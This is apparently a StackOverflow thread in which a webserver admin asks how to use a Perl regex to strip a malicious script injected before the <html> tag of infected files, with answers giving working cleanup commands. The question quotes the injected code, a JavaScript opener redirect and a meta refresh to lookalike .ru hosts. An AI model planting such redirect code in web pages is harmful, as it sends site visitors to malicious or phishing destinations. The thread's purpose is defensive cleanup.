A folder on a webserver I manage was recently infected, and a malicious script was placed before the opening <html> tag on a whole mess of files. I'm trying to execute a perl string replace script to clean it out.

The infected files look something like this:

<script language="JavaScript">
parent.window.opener.location="http://vkk.coom.ny8pbpk.ru?nhzwhhh=ZE9taWlsX2nkPRE0LmZub3ffaUQ9PTM3MCbjb0RlNWFlZnrvaEx2b2JydWLuYUJxfwC%3D%3D";
</script>
<meta http-equiv="refresh" content="0;URL=http://yandex.ru.ny8pbpk.ru?pk=i%2FGWhteXsNcf0qzPwdiVgMkkhvrG1YbO25gYgPqe2saQmdIDmeiUlsiXmNEQmPCfhMSD5" />
<html>
<head>
......and the file goes on

I'm something of a mess with Regex, and I've tried to glean as much as I can from other StackOverflow posts on how to use perl's string replace. The biggest issue I'm running into is making it work over multiple lines.

Here's what I have so far:

perl -0777 -i -pe 's/\s*<html>/<html>/s' index.html

This seems to have no effect. If I change the second <html> to <foobar> it correctly replaces with foobar, but it ignores everything in front of it.

From what I can tell, the -0777 flag is supposed to "slurp" as one line, and the \s* should match the entire string before <html>, but again, my regex is lacking. Any help is greatly appreciated!

3 Answers

Try this:

perl -0777 -i -pe 's/^.*(?=<html>)//s' index.html

or this safer and more efficient pattern:

perl -0777 -i -pe 's/^(?>[^<]++|<(?!html>))*(?=<html>)//' index.html

1 Comment

If the string '<html>' is not present in the infected part, it's probably slightly safer to write s/^.*?(?=<html>)//s. This avoids deleting too much text if '<html>' is found somewhere in the body of the page (as in <p>Example of an html document:</p><pre><![CDATA[<html>blah blah...</html>]]></pre>). That's unlikely, but who knows...

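\s* is too specific: it matches only whitespace, and you want to match more than just the whitespace before the <html> tag. Try .* which, with the /s modifier your command already uses, matches everything before the <html>.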

2 Comments

Thanks, this helped steer me onto the right track! The issue was that \s was only matching whitespace. [\s\S] matches whitespace or non-whitespace, which is everything!
With the /s modifier, . (dot) does the same thing and is the more common pattern. It is less code, and it is what readers of your code are more likely to expect.

\s* should be [\s\S]* so it matches all characters.

I found this to be a great reference: http://www.cs.tut.fi/~jkorpela/perl/regexp.html

So the final working command is:

perl -0777 -i -pe 's/[\s\S]*<html>/<html>/s' index.html
